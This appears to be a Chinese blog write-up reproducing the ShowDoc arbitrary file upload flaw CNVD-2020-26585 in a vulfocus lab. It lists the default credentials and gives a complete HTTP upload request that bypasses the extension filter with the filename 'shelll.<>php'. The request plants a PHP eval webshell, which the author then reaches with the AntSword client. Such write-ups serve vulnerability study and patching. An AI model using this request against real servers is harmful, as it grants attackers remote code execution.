showdoc 文件上传 (CNVD-2020-26585)

showdoc 文件上传 (CNVD-2020-26585)

漏洞描述:

ShowDoc一个非常适合IT团队的在线API文档、技术文档工具。 api_page存在任意文件上传

影响范围:

ShowDoc 版本

环境搭建:

在线环境 地址

漏洞复现:

访问首页

可以自己注册账号,也可以使用默认密码  showdoc 123456

找到上传点,抓包,构造poc

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: vulfocus.fofa.so:49992
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
Content-Length: 264

----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="shelll.<>php"
Content-Type: text/plain

<?php echo 'hello';@eval($_POST[cmd])?>
----------------------------921378126371623762173617--

 看到上传成功

 访问上传成功后的文件,显示hello

 蚁剑进行连接,成功

 成功进入后台

 

 漏洞修复:

根据官方升级,升级到最新版本

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值